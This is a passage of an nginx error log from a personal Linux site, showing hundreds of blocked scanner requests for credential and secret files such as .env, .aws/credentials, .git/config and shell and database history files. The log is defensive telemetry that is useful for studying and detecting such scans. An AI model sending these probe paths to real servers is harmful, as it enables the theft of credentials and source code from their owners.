+2021/11/26 05:04:23 [error] 15701#15701: *65334 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65329 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65333 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /stag/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65335 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65338 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /developer/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65340 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /testing/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65336 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65337 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65341 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /production/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65339 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /platform/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 06:47:33 [error] 15701#15701: *66233 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 06:47:36 [error] 15701#15701: *66237 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66893 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66891 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66890 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66889 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66892 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66898 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /testing/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66897 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /localhost/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66900 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /developer/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66899 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66894 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /stag/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15700#15700: *66896 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:19 [error] 15701#15701: *66895 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:20 [error] 15701#15701: *66902 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:20 [error] 15701#15701: *66905 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /locally/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:20 [error] 15701#15701: *66904 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /production/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:20 [error] 15700#15700: *66901 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /platform/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 07:49:20 [error] 15701#15701: *66903 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 08:42:39 [error] 15701#15701: *67394 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 08:42:41 [error] 15701#15701: *67398 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/27 19:15:22 [error] 15701#15701: *106723 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:15:26 [error] 15701#15701: *106727 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106767 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106768 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106769 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106776 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /platform/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106770 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /stag/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106777 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /locally/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106774 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106773 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /production/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106772 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106775 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106771 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106779 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /localhost/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106778 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /testing/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106780 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106782 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106783 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /developer/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/27 19:17:52 [error] 15701#15701: *106781 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/30 03:11:33 [error] 15701#15701: *137032 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/30 03:11:42 [error] 15701#15701: *137037 access forbidden by rule, client: 159.223.62.240, server: kompilacje.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/30 07:28:39 [error] 15701#15701: *139077 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/30 07:28:52 [error] 15701#15701: *139081 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/30 17:38:02 [error] 15701#15701: *144074 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/30 17:38:09 [error] 15701#15701: *144078 access forbidden by rule, client: 159.223.62.240, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/12/10 06:06:28 [error] 2815#2815: *86740 access forbidden by rule, client: 185.163.47.70, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/12/10 06:21:22 [error] 2815#2815: *86922 access forbidden by rule, client: 185.163.47.70, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/12/10 06:28:41 [error] 2815#2815: *86971 access forbidden by rule, client: 185.163.47.70, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/12/10 11:13:37 [error] 2815#2815: *88673 access forbidden by rule, client: 164.90.222.140, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/12/11 08:15:05 [error] 2815#2815: *95496 access forbidden by rule, client: 164.90.222.140, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/12/11 12:50:20 [error] 2815#2815: *96999 access forbidden by rule, client: 164.90.222.140, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/12/13 17:16:10 [error] 2815#2815: *119431 access forbidden by rule, client: 198.12.127.198, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.env" +2021/12/13 20:59:00 [error] 2815#2815: *121247 access forbidden by rule, client: 198.12.127.198, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.env" +2021/12/13 23:59:52 [error] 2815#2815: *122277 access forbidden by rule, client: 198.12.127.198, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.env" +2021/12/14 05:37:26 [error] 2815#2815: *124145 access forbidden by rule, client: 107.174.142.109, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/12/21 08:45:22 [error] 2815#2815: *216347 access forbidden by rule, client: 107.174.142.109, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/12/24 09:11:04 [error] 16964#16964: *37230 access forbidden by rule, client: 107.174.142.109, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/12/31 21:29:23 [crit] 16964#16964: *157838 SSL_do_handshake() failed (SSL: error:142090BA:SSL routines:tls_early_post_process_client_hello:bad cipher) while SSL handshaking, client: 138.246.253.10, server: 0.0.0.0:443 +2022/01/12 04:37:56 [error] 14905#14905: *8860 access forbidden by rule, client: 46.182.7.14, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/13 16:24:27 [error] 12700#12700: *13990 access forbidden by rule, client: 3.17.57.73, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/14 10:07:13 [error] 12700#12700: *28108 access forbidden by rule, client: 46.182.7.14, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/01/14 14:32:50 [error] 12700#12700: *30149 access forbidden by rule, client: 3.17.57.73, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/01/14 16:08:16 [error] 12700#12700: *30941 access forbidden by rule, client: 3.17.57.73, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/15 09:02:24 [error] 1229#1229: *2218 access forbidden by rule, client: 46.182.7.14, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/16 03:58:11 [error] 1229#1229: *12320 access forbidden by rule, client: 54.163.43.179, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/01/19 00:00:04 [error] 1229#1229: *42472 access forbidden by rule, client: 54.234.165.40, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/01/19 00:00:04 [error] 1229#1229: *42473 access forbidden by rule, client: 54.234.165.40, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/19 00:00:05 [error] 1229#1229: *42474 access forbidden by rule, client: 54.234.165.40, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/20 02:01:51 [error] 1229#1229: *55917 access forbidden by rule, client: 185.220.102.248, server: nginx.linuxiarz.pl, request: "GET /.DhaTPKYDWP8l HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:01:52 [error] 1229#1229: *55917 access forbidden by rule, client: 185.220.102.248, server: nginx.linuxiarz.pl, request: "GET /.jZeOcy9odi9H HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:05 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.g0wcHEX1lDsA HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:06 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.J7Pro39MhfFC HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:06 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.g0wcHEX1lDsA HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:07 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.g0wcHEX1lDsA HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:21 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.admin HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:42 [error] 1229#1229: *55997 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:42 [error] 1229#1229: *55997 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:45 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:53 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.configuration HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:04:53 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.configuration.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:00 [error] 1229#1229: *55995 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.CVS HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:08 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.db HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:20 [error] 1229#1229: *55996 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.dump HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:31 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:31 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:31 [error] 1229#1229: *55995 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:31 [error] 1229#1229: *55996 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.git/head HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:35 [error] 1229#1229: *55995 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.htpasswd.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:44 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:46 [error] 1229#1229: *55995 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.localsettings.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:05:55 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:01 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.pgsql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:13 [error] 1229#1229: *55996 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.settings.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:15 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:19 [error] 1229#1229: *55994 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:21 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.temp HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:22 [error] 1229#1229: *55996 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.test HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:25 [error] 1229#1229: *55995 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.tmp HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 02:06:32 [error] 1229#1229: *55998 access forbidden by rule, client: 185.220.101.61, server: nginx.linuxiarz.pl, request: "GET /.web HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/01/20 19:53:47 [error] 1229#1229: *64359 access forbidden by rule, client: 54.234.165.40, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/31 00:49:49 [error] 23321#23321: *88715 access forbidden by rule, client: 128.199.127.143, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/31 00:49:51 [error] 23321#23321: *88716 access forbidden by rule, client: 128.199.127.143, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/31 00:49:53 [error] 23321#23321: *88717 access forbidden by rule, client: 128.199.127.143, server: pliki.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/01/31 00:49:56 [error] 23321#23321: *88718 access forbidden by rule, client: 128.199.127.143, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/02 14:22:50 [error] 23321#23321: *139295 access forbidden by rule, client: 52.176.154.97, server: kompilacje.linuxiarz.pl, request: "GET /.sitemap.xml HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/03 07:18:40 [error] 23321#23321: *146434 access forbidden by rule, client: 52.165.216.83, server: kompilacje.linuxiarz.pl, request: "GET /.sitemap.xml HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/05 02:06:57 [error] 23321#23321: *166524 access forbidden by rule, client: 40.77.23.44, server: kompilacje.linuxiarz.pl, request: "GET /.sitemap.xml HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/11 17:08:56 [error] 25791#25791: *15860 access forbidden by rule, client: 212.102.33.230, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/02/11 17:09:35 [error] 25791#25791: *15878 access forbidden by rule, client: 212.102.33.230, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/11 17:09:44 [error] 25791#25791: *15882 access forbidden by rule, client: 212.102.33.230, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/12 18:01:47 [error] 25791#25791: *27094 access forbidden by rule, client: 34.216.112.150, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/12 18:01:47 [error] 25791#25791: *27095 access forbidden by rule, client: 34.216.112.150, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/12 18:01:48 [error] 25791#25791: *27096 access forbidden by rule, client: 34.216.112.150, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/12 21:01:21 [error] 25791#25791: *28073 access forbidden by rule, client: 20.124.188.6, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/14 20:09:37 [error] 25791#25791: *57408 access forbidden by rule, client: 128.199.127.143, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/02/14 20:09:40 [error] 25791#25791: *57521 access forbidden by rule, client: 128.199.127.143, server: kodi.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/02/14 20:09:42 [error] 25791#25791: *57537 access forbidden by rule, client: 128.199.127.143, server: kodi.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/02/14 20:09:45 [error] 25791#25791: *57551 access forbidden by rule, client: 128.199.127.143, server: kodi.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2022/02/14 21:16:59 [error] 25791#25791: *59335 access forbidden by rule, client: 128.199.127.143, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/14 21:17:02 [error] 25791#25791: *59336 access forbidden by rule, client: 128.199.127.143, server: kompilacje.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/14 21:17:04 [error] 25791#25791: *59337 access forbidden by rule, client: 128.199.127.143, server: kompilacje.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/14 21:17:07 [error] 25791#25791: *59338 access forbidden by rule, client: 128.199.127.143, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/26 09:17:13 [error] 30557#30557: *20963 access forbidden by rule, client: 89.238.170.237, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/26 09:17:14 [error] 30557#30557: *20967 access forbidden by rule, client: 89.238.170.237, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/26 09:17:15 [error] 30557#30557: *20966 access forbidden by rule, client: 89.238.170.237, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/26 09:17:16 [error] 30557#30557: *20973 access forbidden by rule, client: 89.238.170.237, server: kompilacje.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/26 09:17:17 [error] 30557#30557: *20974 access forbidden by rule, client: 89.238.170.237, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/26 09:17:18 [error] 30557#30557: *20978 access forbidden by rule, client: 89.238.170.237, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/26 09:17:19 [error] 30557#30557: *20982 access forbidden by rule, client: 89.238.170.237, server: kompilacje.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/26 09:17:19 [error] 30557#30557: *20987 access forbidden by rule, client: 89.238.170.237, server: nginx.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/26 09:17:20 [error] 30557#30557: *20999 access forbidden by rule, client: 89.238.170.237, server: pliki.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/26 09:17:21 [error] 30557#30557: *21003 access forbidden by rule, client: 89.238.170.237, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/26 09:17:22 [error] 30557#30557: *21007 access forbidden by rule, client: 89.238.170.237, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/26 09:17:22 [error] 30557#30557: *21000 access forbidden by rule, client: 89.238.170.237, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/02/26 12:01:44 [error] 30557#30557: *22792 access forbidden by rule, client: 34.237.2.231, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2022/02/26 12:01:46 [error] 30557#30557: 